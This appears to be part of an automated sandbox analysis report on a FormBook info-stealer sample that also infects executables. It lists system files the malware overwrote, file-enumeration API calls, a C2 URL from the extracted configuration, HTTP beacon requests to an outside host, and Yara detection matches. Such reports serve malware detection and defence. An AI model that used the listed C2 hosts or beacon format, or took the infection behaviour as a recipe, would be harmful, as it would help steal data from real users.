Source: Yara match | File source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
Source: Yara match | File source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
Infects executable files (exe, dll, sys, html)
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00405080 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00405634 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404F6C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EA04 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EB16 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405CD8 FindFirstFileA,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_0040263E FindFirstFileA,
          Source: C:\Windows\svchost.comCode function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_00404F6C FindFirstFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040EA04 FindFirstFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040EB16 FindFirstFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\11357\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor | URLs: www.personalizedyardsigns.com/xkcp/
          Uses netstat to query active network connections and open ports
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global traffic | HTTP traffic detected: GET /xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== HTTP/1.1 Host: www.agileintelligence.coach Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== HTTP/1.1 Host: www.agileintelligence.coach Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknown | DNS traffic detected: queries for: www.agileintelligence.coach
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: vi0EwpbUht.exe, vi0EwpbUht.exe, 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp, vi0EwpbUht.exe, 00000003.00000000.322686039.0000000000409000.00000008.00020000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vi0EwpbUht.exe, 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp, vi0EwpbUht.exe, 00000003.00000000.322686039.0000000000409000.00000008.00020000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.337120885.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 2_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: vi0EwpbUht.exe, 00000001.00000003.460371414.0000000002390000.00000004.00000001.sdmp | Binary or memory string: _WinAPI_RegisterRawInputDevices.au3

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
